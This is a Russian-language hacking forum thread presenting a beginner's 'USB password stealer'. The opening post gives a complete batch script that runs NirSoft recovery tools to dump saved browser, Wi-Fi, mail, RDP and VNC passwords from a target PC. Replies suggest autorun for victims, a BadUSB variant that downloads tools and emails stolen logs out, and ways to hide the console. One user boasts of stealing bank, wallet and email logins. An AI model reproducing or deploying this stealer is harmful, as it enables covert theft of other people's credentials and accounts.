• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Создаем USB stealer паролей (для начинающих)

U

Ubop0202

Приветсвую!
Мой первый пост, так что не судите строго :)
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.

Создаем USB stealer паролей (для начинающих)

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта :
  • MessenPass
  • Mail PassView
  • Protected Storage PassView
  • Dialupass
  • BulletsPassView
  • Network Password Recovery
  • SniffPass Password Sniffer
  • RouterPassView
  • PstPassword
  • WebBrowserPassView
  • WirelessKeyView
  • Remote Desktop PassView
  • VNCPassView
После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
после сохранив его как backup.bat, копируем на флешку.

4) Вуаля, вы восхитительны! Можете вставить флешку в любой ПК, запустить backup.bat и у вас создадутся *.txt файлы с паролями браузеров, wifi, vnc и т.д.

От автора:
1) в чем плюс данного метода? вышеуказанный софт, вы качаете с офф.сайта (собственно уже можно быть уверенным, что к ним не привязаны другие вирусы от автора статьи)
2) также можно воспользоваться данной тулзой: , если будет интересно запилю howto на русском языке.
 
V

Valkiria

Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?
 
Глюк

Глюк

Red Team
03.01.2018
1 025
1 789
также можно воспользоваться данной тулзой: , если будет интересно запилю howto на русском языке.
конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
568
Наверное, можно добавить файл autorun.inf в корень флэшки.
Если у жертвы на компе не отключен автозапуск со сменных носителей, то и запускать вручную ничего не нужно ))

А как отреагирует на запуск этих программ UAC ?
начиная с виндовс 7 отключено вендором. после чего обновление функция была отключена на Хр и висте
 
  • Нравится
Реакции: Vertigo и Ubop0202
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
568
конечно интересно....
я очень давно делал подобную флешку для виндовс систем на лазанье... где то на старых дисках даже батник должен остаться... но время бежит и всё меняется. может я безнадёжно отстал от прогресса.... )))
на странице проекта всё описанно, работает не плохо но некоторы АВ ругаются.
 
  • Нравится
Реакции: Глюк
Xulinam

Xulinam

Премиум
02.03.2017
463
180
неплохо так пароли вспоминает) однако от vk и фэйсбука не вспомнила))
 
S

swap3r

Happy New Year
06.11.2016
71
57
интегрировать с атаками типа badusb будет в самый раз. стилер, скачивающий в тихом режиме с некоего хостинга заранее подготовленный sfx архив с утилитами нирсофта, быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл (можно добавить консольную мейл отправлялку в архив и команду на ее запуск в батник, как-то так)
 
  • Нравится
Реакции: Qmakake и Tihon49
Xulinam

Xulinam

Премиум
02.03.2017
463
180
быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл
При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(
 
S

swap3r

Happy New Year
06.11.2016
71
57
При запуске )) появляеться Окно ДОСА!!!!!!!!! и если он не находит от куда востанавливать пароли то пишет ошибку!! тоесть не заметно это не прокатит(
только что проверил на тестовом скрипте из нескольких строчек. Действительно окошко консоли появляется, но ненадолго. Если перенаправить вывод в файл (вот так ">"), то, по идее не должно появляться, либо появиться совсем ненадолго. ошибки можно либо перенаправлять в файл, либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь :)
 
  • Нравится
Реакции: Tihon49 и Xulinam
Xulinam

Xulinam

Премиум
02.03.2017
463
180
либо "пофиксить" их в екзешниках нирфовтового софта (удалив лишние диалоги в ресурсах, например).
Кому надо - тот найдет правильный путь :)
так это понятно)) просто я говорю что вижу по факту)))))
 
Xulinam

Xulinam

Премиум
02.03.2017
463
180
Нефига в текстовой файл не записывается он) Тупа открылись все проги и че? А авто не сохраняет, доработать надо батник
Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
все отлично сохранет проверенно на вин10
 
  • Нравится
Реакции: ferentar
A

Asset030303

Код:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt
все отлично сохранет проверенно на вин10
Я только что запустил для одной проге как легкий пример, например тот же WebBrowserPassView, он не сохраняет все найденные пароли в текстовой док, а просто откроет прогу и рядом его cfg файл и тогда какой смысл самого батника !

mailpv также не работает, просто пустое окно открывается проги и все)
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
568
кстати очень похоже на перевод статьи
 
☠xrahitel☠

☠xrahitel☠

Happy New Year
09.12.2016
163
268
вот это хорошо тащит у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru
осталось терпиле подгрузить ну это Вы сами у же.
 
S

subvert

К удалению 21.01.2019
10.09.2017
1
0
вот это хорошо тащит у меня вытащила от киви,хостинг,gmail,банкмм tinkoff.ru,яндекс,vk.com,blockchain.info,yahoo.com,mail,amazon.com,rambler.ru
осталось терпиле подгрузить ну это Вы сами у же.
не работает с кириллическим именем пользователя Windows.
 
☠xrahitel☠

☠xrahitel☠

Happy New Year
09.12.2016
163
268
не работает с кириллическим именем пользователя Windows.
можно прочитать но там старая версия тащит от жабы да учетак все что есть на компе
если за были пароль от своего дедика потерянного в 2016 не х.. страшного.
 
  • Нравится
Реакции: Tihon49
wittmann404

wittmann404

Active member
28.03.2016
37
8
Какая команда в батнике должна быть чтобы записывал все в файлик?
 
Sunnych

Sunnych

Mod. Forensics
Gold Team
01.06.2018
220
1 014
Приветсвую!
Мой первый пост, так что не судите строго :)
Nirsoft распознается Windows 10 как вирусные программы :-( проверенно давным давно, только что перепроверил, без внесения в исключения файлы Nirsoft удаляются
 
5h3ll

5h3ll

Mod. Ethical Hacking
Red Team
23.01.2018
351
568
  • Нравится
Реакции: Sunnych
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб